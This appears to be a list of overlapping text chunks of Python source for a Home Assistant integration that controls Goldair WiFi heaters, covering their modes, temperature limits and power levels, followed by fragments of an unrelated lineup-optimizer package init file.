Args: name", "HVAC_MODE_TO_DPS_MODE[hvac_mode] self._device.set_property(self.get_property_to_dps_id[ATTR_HVAC_MODE], dps_mode) @property def preset_mode(self): \"\"\"Return current preset mode, ie Comfort, Eco,", "'3', ATTR_PRESET_MODE: '4', ATTR_CHILD_LOCK: '6', ATTR_FAULT: '12', ATTR_POWER_LEVEL: '101', ATTR_DISPLAY_ON: '104', ATTR_POWER_MODE: '105',", "def set_hvac_mode(self, hvac_mode): \"\"\"Set new HVAC mode.\"\"\" dps_mode = HVAC_MODE_TO_DPS_MODE[hvac_mode] self._device.set_property(self.get_property_to_dps_id[ATTR_HVAC_MODE], dps_mode) @property", "self._device.get_property(self.get_property_to_dps_id[ATTR_POWER_LEVEL]) elif dps_mode == ATTR_POWER_MODE_AUTO: return GoldairTuyaDevice.get_key_for_value(POWER_LEVEL_TO_DPS_LEVEL, dps_mode) else: return None @property def", "'2', ATTR_TEMPERATURE: '3', ATTR_PRESET_MODE: '4', ATTR_CHILD_LOCK: '6', ATTR_FAULT: '12', ATTR_POWER_LEVEL: '101', ATTR_DISPLAY_ON: '104',", "def min_temp(self): \"\"\"Return the minimum temperature.\"\"\" if self.preset_mode and self.preset_mode != STATE_ANTI_FREEZE: return", "= { STATE_COMFORT: { 'min': 5, 'max': 37 }, STATE_ECO: { 'min': 5,", "on the model of the heater you have\"\"\" if self._device.model == \"GECO270\": return", "'4', ATTR_CHILD_LOCK: '6', ATTR_FAULT: '12', ATTR_POWER_LEVEL: '101', ATTR_DISPLAY_ON: '104', ATTR_POWER_MODE: '105', ATTR_ECO_TARGET_TEMPERATURE: '106'", "STATE_ANTI_FREEZE: return self._TEMPERATURE_LIMITS[self.preset_mode]['min'] else: return None @property def max_temp(self): \"\"\"Return the maximum temperature.\"\"\"", "== STATE_COMFORT: return self._device.get_property(self.get_property_to_dps_id[ATTR_TARGET_TEMPERATURE]) elif self.preset_mode == STATE_ECO: return self._device.get_property(self.get_property_to_dps_id[ATTR_ECO_TARGET_TEMPERATURE]) else: return None", "dps_mode is not None: return GoldairTuyaDevice.get_key_for_value(HVAC_MODE_TO_DPS_MODE, dps_mode) else: return STATE_UNAVAILABLE @property def hvac_modes(self):", "@property def name(self): 
\"\"\"Return the name of the climate device.\"\"\" return self._device.name @property", "current_temperature(self): \"\"\"Return the current temperature.\"\"\" return self._device.get_property(self.get_property_to_dps_id[ATTR_TEMPERATURE]) @property def hvac_mode(self): \"\"\"Return current HVAC", "1 self._TEMPERATURE_LIMITS = { STATE_COMFORT: { 'min': 5, 'max': 37 }, STATE_ECO: {", "mode.') limits = self._TEMPERATURE_LIMITS[preset_mode] if not limits['min'] <= target_temperature <= limits['max']: raise ValueError(", "return self._support_flags @property def should_poll(self): \"\"\"Return the polling state.\"\"\" return True @property def", "HVAC mode.\"\"\" dps_mode = HVAC_MODE_TO_DPS_MODE[hvac_mode] self._device.set_property(self.get_property_to_dps_id[ATTR_HVAC_MODE], dps_mode) @property def preset_mode(self): \"\"\"Return current preset", "ATTR_HVAC_MODE: '1', ATTR_TARGET_TEMPERATURE: '2', ATTR_TEMPERATURE: '3', ATTR_PRESET_MODE: '4', ATTR_CHILD_LOCK: '6', ATTR_FAULT: '12', ATTR_POWER_LEVEL:", "GoldairTuyaDevice _LOGGER = logging.getLogger(__name__) ATTR_TARGET_TEMPERATURE = 'target_temperature' ATTR_CHILD_LOCK = 'child_lock' ATTR_FAULT = 'fault'", "'power_mode' ATTR_ECO_TARGET_TEMPERATURE = 'eco_' + ATTR_TARGET_TEMPERATURE STATE_COMFORT = 'Comfort' STATE_ECO = 'Eco' STATE_ANTI_FREEZE", "\"\"\" Goldair WiFi Heater device. 
\"\"\" import logging import json from homeassistant.const import", "not in POWER_LEVEL_TO_DPS_LEVEL.keys(): raise ValueError(f'Invalid power level: {new_level}') dps_level = POWER_LEVEL_TO_DPS_LEVEL[new_level] self._device.set_property(self.get_property_to_dps_id[ATTR_POWER_LEVEL], dps_level)", "self._support_flags = SUPPORT_FLAGS self._TEMPERATURE_STEP = 1 self._TEMPERATURE_LIMITS = { STATE_COMFORT: { 'min': 5,", "ATTR_CHILD_LOCK: '6', ATTR_FAULT: '12', ATTR_POWER_LEVEL: '101', ATTR_DISPLAY_ON: '104', ATTR_POWER_MODE: '105', ATTR_ECO_TARGET_TEMPERATURE: '106' }", "'fault' ATTR_POWER_MODE_AUTO = 'auto' ATTR_POWER_MODE_USER = 'user' ATTR_POWER_LEVEL = 'power_level' ATTR_DISPLAY_ON = 'display_on'", "None: return GoldairTuyaDevice.get_key_for_value(PRESET_MODE_TO_DPS_MODE, dps_mode) else: return None @property def preset_modes(self): \"\"\"Return the list", "import json from homeassistant.const import ( ATTR_TEMPERATURE, TEMP_CELSIUS, STATE_UNAVAILABLE ) from homeassistant.components.climate import", "level.\"\"\" dps_mode = self._device.get_property(self.get_property_to_dps_id[ATTR_POWER_MODE]) if dps_mode == ATTR_POWER_MODE_USER: return self._device.get_property(self.get_property_to_dps_id[ATTR_POWER_LEVEL]) elif dps_mode ==", "keys = list(self.get_property_to_dps_id) if dps_mode not in keys: _LOGGER.debug(f'Could not load correct preset", "the temperature we try to reach.\"\"\" if self.preset_mode == STATE_COMFORT: return self._device.get_property(self.get_property_to_dps_id[ATTR_TARGET_TEMPERATURE]) elif", "raise ValueError('You cannot set the temperature in Anti-freeze mode.') limits = self._TEMPERATURE_LIMITS[preset_mode] if", ") from custom_components.goldair_climate import GoldairTuyaDevice _LOGGER = logging.getLogger(__name__) ATTR_TARGET_TEMPERATURE = 'target_temperature' ATTR_CHILD_LOCK =", "model # _LOGGER.info(f'Setting model to {model}') @property def get_property_to_dps_id(self): \"\"\"Get the correct PROPERTY_TO_DPS_ID", "5, 'max': 21 } } # 
self._model = model # _LOGGER.info(f'Setting model to", "if kwargs.get(ATTR_PRESET_MODE) is not None: self.set_preset_mode(kwargs.get(ATTR_PRESET_MODE)) if kwargs.get(ATTR_TEMPERATURE) is not None: self.set_target_temperature(kwargs.get(ATTR_TEMPERATURE)) def", "'101', ATTR_DISPLAY_ON: '104', ATTR_POWER_MODE: '105', ATTR_ECO_TARGET_TEMPERATURE: '106' } # GOLDAIR GECO270 PROPERTY_TO_DPS_ID_GECO270 =", "preset_mode): \"\"\"Set new preset mode.\"\"\" dps_mode = PRESET_MODE_TO_DPS_MODE[preset_mode] self._device.set_property(self.get_property_to_dps_id[ATTR_PRESET_MODE], dps_mode) @property def swing_mode(self):", "= { 'Stop': 'stop', '1': '1', '2': '2', '3': '3', '4': '4', '5':", "the climate device.\"\"\" return self._device.name @property def temperature_unit(self): \"\"\"Return the unit of measurement.\"\"\"", "ATTR_POWER_MODE: '105', ATTR_ECO_TARGET_TEMPERATURE: '106' } HVAC_MODE_TO_DPS_MODE = { HVAC_MODE_OFF: False, HVAC_MODE_HEAT: True }", "the unit of measurement.\"\"\" return self._device.temperature_unit @property def target_temperature(self): \"\"\"Return the temperature we", "if self.preset_mode and self.preset_mode != STATE_ANTI_FREEZE: return self._TEMPERATURE_LIMITS[self.preset_mode]['max'] else: return None def set_temperature(self,", "dps_mode = self._device.get_property(self.get_property_to_dps_id[ATTR_PRESET_MODE]) keys = list(self.get_property_to_dps_id) if dps_mode not in keys: _LOGGER.debug(f'Could not", "name. device (GoldairTuyaDevice): The device API instance.\"\"\" self._device = device self._support_flags = SUPPORT_FLAGS", "= device self._support_flags = SUPPORT_FLAGS self._TEMPERATURE_STEP = 1 self._TEMPERATURE_LIMITS = { STATE_COMFORT: {", "'Anti-freeze' PROPERTY_TO_DPS_ID = { ATTR_HVAC_MODE: '1', ATTR_TARGET_TEMPERATURE: '2', ATTR_TEMPERATURE: '3', ATTR_PRESET_MODE: '4', ATTR_CHILD_LOCK:", "keys: _LOGGER.debug(f'Could not load correct preset mode from api status. 
Defaulting to Comfort')", "'power_level' ATTR_DISPLAY_ON = 'display_on' ATTR_POWER_MODE = 'power_mode' ATTR_ECO_TARGET_TEMPERATURE = 'eco_' + ATTR_TARGET_TEMPERATURE STATE_COMFORT", "ATTR_POWER_MODE: '105', ATTR_ECO_TARGET_TEMPERATURE: '106' } # GOLDAIR GECO270 PROPERTY_TO_DPS_ID_GECO270 = { ATTR_HVAC_MODE: '1',", "The device API instance.\"\"\" self._device = device self._support_flags = SUPPORT_FLAGS self._TEMPERATURE_STEP = 1", "== ATTR_POWER_MODE_AUTO: return GoldairTuyaDevice.get_key_for_value(POWER_LEVEL_TO_DPS_LEVEL, dps_mode) else: return None @property def swing_modes(self): \"\"\"List of", "return GoldairTuyaDevice.get_key_for_value(POWER_LEVEL_TO_DPS_LEVEL, dps_mode) else: return None @property def swing_modes(self): \"\"\"List of power levels.\"\"\"", "def set_swing_mode(self, swing_mode): \"\"\"Set new power level.\"\"\" new_level = swing_mode if new_level not", "\"GECO270\": return PROPERTY_TO_DPS_ID_GECO270 else: return PROPERTY_TO_DPS_ID @property def supported_features(self): \"\"\"Return the list of", "} # GOLDAIR GECO270 PROPERTY_TO_DPS_ID_GECO270 = { ATTR_HVAC_MODE: '1', ATTR_TARGET_TEMPERATURE: '3', ATTR_TEMPERATURE: '4',", "the minimum temperature.\"\"\" if self.preset_mode and self.preset_mode != STATE_ANTI_FREEZE: return self._TEMPERATURE_LIMITS[self.preset_mode]['min'] else: return", "PRESET_MODE_TO_DPS_MODE[preset_mode] self._device.set_property(self.get_property_to_dps_id[ATTR_PRESET_MODE], dps_mode) @property def swing_mode(self): \"\"\"Return the power level.\"\"\" dps_mode = self._device.get_property(self.get_property_to_dps_id[ATTR_POWER_MODE])", "import GoldairTuyaDevice _LOGGER = logging.getLogger(__name__) ATTR_TARGET_TEMPERATURE = 'target_temperature' ATTR_CHILD_LOCK = 'child_lock' ATTR_FAULT =", "'Eco' STATE_ANTI_FREEZE = 'Anti-freeze' PROPERTY_TO_DPS_ID = { ATTR_HVAC_MODE: '1', ATTR_TARGET_TEMPERATURE: '2', ATTR_TEMPERATURE: '3',", "preset mode, ie Comfort, Eco, Anti-freeze.\"\"\" dps_mode = 
self._device.get_property(self.get_property_to_dps_id[ATTR_PRESET_MODE]) keys = list(self.get_property_to_dps_id) if", "= { STATE_COMFORT: 'C', STATE_ECO: 'ECO', STATE_ANTI_FREEZE: 'AF' } POWER_LEVEL_TO_DPS_LEVEL = { 'Stop':", "= HVAC_MODE_TO_DPS_MODE[hvac_mode] self._device.set_property(self.get_property_to_dps_id[ATTR_HVAC_MODE], dps_mode) @property def preset_mode(self): \"\"\"Return current preset mode, ie Comfort,", "device API instance.\"\"\" self._device = device self._support_flags = SUPPORT_FLAGS self._TEMPERATURE_STEP = 1 self._TEMPERATURE_LIMITS", "Heater device. \"\"\" import logging import json from homeassistant.const import ( ATTR_TEMPERATURE, TEMP_CELSIUS,", "device): \"\"\"Initialize the heater. Args: name (str): The device's name. device (GoldairTuyaDevice): The", "temperature.\"\"\" if self.preset_mode and self.preset_mode != STATE_ANTI_FREEZE: return self._TEMPERATURE_LIMITS[self.preset_mode]['min'] else: return None @property", "def __init__(self, device): \"\"\"Initialize the heater. Args: name (str): The device's name. 
device", "'104', ATTR_POWER_MODE: '105', ATTR_ECO_TARGET_TEMPERATURE: '106' } HVAC_MODE_TO_DPS_MODE = { HVAC_MODE_OFF: False, HVAC_MODE_HEAT: True", "was: {json.dumps(self.get_property_to_dps_id)}') dps_mode = 'C' if dps_mode is not None: return GoldairTuyaDevice.get_key_for_value(PRESET_MODE_TO_DPS_MODE, dps_mode)", "the correct PROPERTY_TO_DPS_ID depending on the model of the heater you have\"\"\" if", "return GoldairTuyaDevice.get_key_for_value(HVAC_MODE_TO_DPS_MODE, dps_mode) else: return STATE_UNAVAILABLE @property def hvac_modes(self): \"\"\"Return the list of", "{limits[\"max\"]}' ) if preset_mode == STATE_COMFORT: self._device.set_property(self.get_property_to_dps_id[ATTR_TARGET_TEMPERATURE], target_temperature) elif preset_mode == STATE_ECO: self._device.set_property(self.get_property_to_dps_id[ATTR_ECO_TARGET_TEMPERATURE],", "homeassistant.const import ( ATTR_TEMPERATURE, TEMP_CELSIUS, STATE_UNAVAILABLE ) from homeassistant.components.climate import ClimateDevice from homeassistant.components.climate.const", "__init__(self, device): \"\"\"Initialize the heater. Args: name (str): The device's name. 
device (GoldairTuyaDevice):", "(GoldairTuyaDevice): The device API instance.\"\"\" self._device = device self._support_flags = SUPPORT_FLAGS self._TEMPERATURE_STEP =", "\"\"\"Return the list of supported features.\"\"\" return self._support_flags @property def should_poll(self): \"\"\"Return the", "hvac_modes(self): \"\"\"Return the list of available HVAC modes.\"\"\" return list(HVAC_MODE_TO_DPS_MODE.keys()) def set_hvac_mode(self, hvac_mode):", "HVAC_MODE_HEAT: True } PRESET_MODE_TO_DPS_MODE = { STATE_COMFORT: 'C', STATE_ECO: 'ECO', STATE_ANTI_FREEZE: 'AF' }", "if preset_mode == STATE_ANTI_FREEZE: raise ValueError('You cannot set the temperature in Anti-freeze mode.')", "GoldairHeater(ClimateDevice): \"\"\"Representation of a Goldair WiFi heater.\"\"\" def __init__(self, device): \"\"\"Initialize the heater.", "self._device.get_property(self.get_property_to_dps_id[ATTR_TARGET_TEMPERATURE]) elif self.preset_mode == STATE_ECO: return self._device.get_property(self.get_property_to_dps_id[ATTR_ECO_TARGET_TEMPERATURE]) else: return None @property def target_temperature_step(self):", "ATTR_HVAC_MODE: '1', ATTR_TARGET_TEMPERATURE: '3', ATTR_TEMPERATURE: '4', ATTR_PRESET_MODE: '5', ATTR_CHILD_LOCK: '2', ATTR_FAULT: '12', ATTR_POWER_LEVEL:", "ATTR_POWER_LEVEL = 'power_level' ATTR_DISPLAY_ON = 'display_on' ATTR_POWER_MODE = 'power_mode' ATTR_ECO_TARGET_TEMPERATURE = 'eco_' +", "HVAC modes.\"\"\" return list(HVAC_MODE_TO_DPS_MODE.keys()) def set_hvac_mode(self, hvac_mode): \"\"\"Set new HVAC mode.\"\"\" dps_mode =", "self._device.set_property(self.get_property_to_dps_id[ATTR_PRESET_MODE], dps_mode) @property def swing_mode(self): \"\"\"Return the power level.\"\"\" dps_mode = self._device.get_property(self.get_property_to_dps_id[ATTR_POWER_MODE]) if", "set_target_temperature(self, target_temperature): target_temperature = int(round(target_temperature)) preset_mode = self.preset_mode if preset_mode == STATE_ANTI_FREEZE: raise", "from homeassistant.components.climate.const 
import ( ATTR_HVAC_MODE, ATTR_PRESET_MODE, HVAC_MODE_OFF, HVAC_MODE_HEAT, SUPPORT_TARGET_TEMPERATURE, SUPPORT_PRESET_MODE, SUPPORT_SWING_MODE ) from", "PRESET_MODE_TO_DPS_MODE = { STATE_COMFORT: 'C', STATE_ECO: 'ECO', STATE_ANTI_FREEZE: 'AF' } POWER_LEVEL_TO_DPS_LEVEL = {", "ATTR_PRESET_MODE: '4', ATTR_CHILD_LOCK: '6', ATTR_FAULT: '12', ATTR_POWER_LEVEL: '101', ATTR_DISPLAY_ON: '104', ATTR_POWER_MODE: '105', ATTR_ECO_TARGET_TEMPERATURE:", "dps_mode == ATTR_POWER_MODE_AUTO: return GoldairTuyaDevice.get_key_for_value(POWER_LEVEL_TO_DPS_LEVEL, dps_mode) else: return None @property def swing_modes(self): \"\"\"List", "new power level.\"\"\" new_level = swing_mode if new_level not in POWER_LEVEL_TO_DPS_LEVEL.keys(): raise ValueError(f'Invalid", "of available preset modes.\"\"\" return list(PRESET_MODE_TO_DPS_MODE.keys()) def set_preset_mode(self, preset_mode): \"\"\"Set new preset mode.\"\"\"", "name(self): \"\"\"Return the name of the climate device.\"\"\" return self._device.name @property def temperature_unit(self):", "f'Target temperature ({target_temperature}) must be between ' f'{limits[\"min\"]} and {limits[\"max\"]}' ) if preset_mode", "list of available HVAC modes.\"\"\" return list(HVAC_MODE_TO_DPS_MODE.keys()) def set_hvac_mode(self, hvac_mode): \"\"\"Set new HVAC", "self._TEMPERATURE_LIMITS[self.preset_mode]['max'] else: return None def set_temperature(self, **kwargs): \"\"\"Set new target temperatures.\"\"\" if kwargs.get(ATTR_PRESET_MODE)", "else: return STATE_UNAVAILABLE @property def hvac_modes(self): \"\"\"Return the list of available HVAC modes.\"\"\"", "# self._model = model # _LOGGER.info(f'Setting model to {model}') @property def get_property_to_dps_id(self): \"\"\"Get", "the polling state.\"\"\" return True @property def name(self): \"\"\"Return the name of the", "STATE_ANTI_FREEZE: 'AF' } POWER_LEVEL_TO_DPS_LEVEL = { 'Stop': 'stop', '1': '1', '2': '2', '3':", "'Comfort' STATE_ECO = 'Eco' STATE_ANTI_FREEZE = 'Anti-freeze' PROPERTY_TO_DPS_ID = { 
ATTR_HVAC_MODE: '1', ATTR_TARGET_TEMPERATURE:", "if dps_mode == ATTR_POWER_MODE_USER: return self._device.get_property(self.get_property_to_dps_id[ATTR_POWER_LEVEL]) elif dps_mode == ATTR_POWER_MODE_AUTO: return GoldairTuyaDevice.get_key_for_value(POWER_LEVEL_TO_DPS_LEVEL, dps_mode)", "raise ValueError(f'Invalid power level: {new_level}') dps_level = POWER_LEVEL_TO_DPS_LEVEL[new_level] self._device.set_property(self.get_property_to_dps_id[ATTR_POWER_LEVEL], dps_level) def update(self): self._device.refresh()", "preset_mode = self.preset_mode if preset_mode == STATE_ANTI_FREEZE: raise ValueError('You cannot set the temperature", "temperatures.\"\"\" if kwargs.get(ATTR_PRESET_MODE) is not None: self.set_preset_mode(kwargs.get(ATTR_PRESET_MODE)) if kwargs.get(ATTR_TEMPERATURE) is not None: self.set_target_temperature(kwargs.get(ATTR_TEMPERATURE))", "the model of the heater you have\"\"\" if self._device.model == \"GECO270\": return PROPERTY_TO_DPS_ID_GECO270", "if dps_mode not in keys: _LOGGER.debug(f'Could not load correct preset mode from api", "'12', ATTR_POWER_LEVEL: '101', ATTR_DISPLAY_ON: '104', ATTR_POWER_MODE: '105', ATTR_ECO_TARGET_TEMPERATURE: '106' } HVAC_MODE_TO_DPS_MODE = {", "'C' if dps_mode is not None: return GoldairTuyaDevice.get_key_for_value(PRESET_MODE_TO_DPS_MODE, dps_mode) else: return None @property", "correct PROPERTY_TO_DPS_ID depending on the model of the heater you have\"\"\" if self._device.model", "name of the climate device.\"\"\" return self._device.name @property def temperature_unit(self): \"\"\"Return the unit", "new preset mode.\"\"\" dps_mode = PRESET_MODE_TO_DPS_MODE[preset_mode] self._device.set_property(self.get_property_to_dps_id[ATTR_PRESET_MODE], dps_mode) @property def swing_mode(self): \"\"\"Return the", "Eco, Anti-freeze.\"\"\" dps_mode = self._device.get_property(self.get_property_to_dps_id[ATTR_PRESET_MODE]) keys = list(self.get_property_to_dps_id) if dps_mode not in keys:", "'child_lock' ATTR_FAULT = 'fault' 
ATTR_POWER_MODE_AUTO = 'auto' ATTR_POWER_MODE_USER = 'user' ATTR_POWER_LEVEL = 'power_level'", "dps_mode = 'C' if dps_mode is not None: return GoldairTuyaDevice.get_key_for_value(PRESET_MODE_TO_DPS_MODE, dps_mode) else: return", "from custom_components.goldair_climate import GoldairTuyaDevice _LOGGER = logging.getLogger(__name__) ATTR_TARGET_TEMPERATURE = 'target_temperature' ATTR_CHILD_LOCK = 'child_lock'", "ATTR_POWER_MODE_AUTO: return GoldairTuyaDevice.get_key_for_value(POWER_LEVEL_TO_DPS_LEVEL, dps_mode) else: return None @property def swing_modes(self): \"\"\"List of power", "\"\"\"Return the power level.\"\"\" dps_mode = self._device.get_property(self.get_property_to_dps_id[ATTR_POWER_MODE]) if dps_mode == ATTR_POWER_MODE_USER: return self._device.get_property(self.get_property_to_dps_id[ATTR_POWER_LEVEL])", "Comfort, Eco, Anti-freeze.\"\"\" dps_mode = self._device.get_property(self.get_property_to_dps_id[ATTR_PRESET_MODE]) keys = list(self.get_property_to_dps_id) if dps_mode not in", "target_temperature_step(self): \"\"\"Return the supported step of target temperature.\"\"\" return self._TEMPERATURE_STEP @property def min_temp(self):", "'105', ATTR_ECO_TARGET_TEMPERATURE: '106' } HVAC_MODE_TO_DPS_MODE = { HVAC_MODE_OFF: False, HVAC_MODE_HEAT: True } PRESET_MODE_TO_DPS_MODE", "STATE_ECO: self._device.set_property(self.get_property_to_dps_id[ATTR_ECO_TARGET_TEMPERATURE], target_temperature) @property def current_temperature(self): \"\"\"Return the current temperature.\"\"\" return self._device.get_property(self.get_property_to_dps_id[ATTR_TEMPERATURE]) @property", "list(POWER_LEVEL_TO_DPS_LEVEL.keys()) def set_swing_mode(self, swing_mode): \"\"\"Set new power level.\"\"\" new_level = swing_mode if new_level", "elif dps_mode == ATTR_POWER_MODE_AUTO: return GoldairTuyaDevice.get_key_for_value(POWER_LEVEL_TO_DPS_LEVEL, dps_mode) else: return None @property def swing_modes(self):", "int(round(target_temperature)) preset_mode = self.preset_mode if preset_mode == 
STATE_ANTI_FREEZE: raise ValueError('You cannot set the", "self._device.set_property(self.get_property_to_dps_id[ATTR_TARGET_TEMPERATURE], target_temperature) elif preset_mode == STATE_ECO: self._device.set_property(self.get_property_to_dps_id[ATTR_ECO_TARGET_TEMPERATURE], target_temperature) @property def current_temperature(self): \"\"\"Return the", "cannot set the temperature in Anti-freeze mode.') limits = self._TEMPERATURE_LIMITS[preset_mode] if not limits['min']", "def swing_mode(self): \"\"\"Return the power level.\"\"\" dps_mode = self._device.get_property(self.get_property_to_dps_id[ATTR_POWER_MODE]) if dps_mode == ATTR_POWER_MODE_USER:", "self._device.temperature_unit @property def target_temperature(self): \"\"\"Return the temperature we try to reach.\"\"\" if self.preset_mode", "else: return None def set_temperature(self, **kwargs): \"\"\"Set new target temperatures.\"\"\" if kwargs.get(ATTR_PRESET_MODE) is", "return True @property def name(self): \"\"\"Return the name of the climate device.\"\"\" return", "return self._TEMPERATURE_LIMITS[self.preset_mode]['max'] else: return None def set_temperature(self, **kwargs): \"\"\"Set new target temperatures.\"\"\" if", "return list(HVAC_MODE_TO_DPS_MODE.keys()) def set_hvac_mode(self, hvac_mode): \"\"\"Set new HVAC mode.\"\"\" dps_mode = HVAC_MODE_TO_DPS_MODE[hvac_mode] self._device.set_property(self.get_property_to_dps_id[ATTR_HVAC_MODE],", "self._device.get_property(self.get_property_to_dps_id[ATTR_POWER_MODE]) if dps_mode == ATTR_POWER_MODE_USER: return self._device.get_property(self.get_property_to_dps_id[ATTR_POWER_LEVEL]) elif dps_mode == ATTR_POWER_MODE_AUTO: return GoldairTuyaDevice.get_key_for_value(POWER_LEVEL_TO_DPS_LEVEL,", "SUPPORT_PRESET_MODE | SUPPORT_SWING_MODE class GoldairHeater(ClimateDevice): \"\"\"Representation of a Goldair WiFi heater.\"\"\" def __init__(self,", "limits = self._TEMPERATURE_LIMITS[preset_mode] if not limits['min'] <= target_temperature <= limits['max']: raise ValueError( 
f'Target", "= SUPPORT_TARGET_TEMPERATURE | SUPPORT_PRESET_MODE | SUPPORT_SWING_MODE class GoldairHeater(ClimateDevice): \"\"\"Representation of a Goldair WiFi", "current temperature.\"\"\" return self._device.get_property(self.get_property_to_dps_id[ATTR_TEMPERATURE]) @property def hvac_mode(self): \"\"\"Return current HVAC mode, ie Heat", "def max_temp(self): \"\"\"Return the maximum temperature.\"\"\" if self.preset_mode and self.preset_mode != STATE_ANTI_FREEZE: return", "not None: return GoldairTuyaDevice.get_key_for_value(HVAC_MODE_TO_DPS_MODE, dps_mode) else: return STATE_UNAVAILABLE @property def hvac_modes(self): \"\"\"Return the", "return PROPERTY_TO_DPS_ID_GECO270 else: return PROPERTY_TO_DPS_ID @property def supported_features(self): \"\"\"Return the list of supported", "list of available preset modes.\"\"\" return list(PRESET_MODE_TO_DPS_MODE.keys()) def set_preset_mode(self, preset_mode): \"\"\"Set new preset" ]
[ "from .importer import * from .settings import * __all__ = [ 'DraftstarsCSVImporter', 'DraftstarsNFLSettings'", "<filename>pydfs_lineup_optimizer/sites/draftstarsnfl/__init__.py from .importer import * from .settings import * __all__ = [ 'DraftstarsCSVImporter',", ".importer import * from .settings import * __all__ = [ 'DraftstarsCSVImporter', 'DraftstarsNFLSettings' ]" ]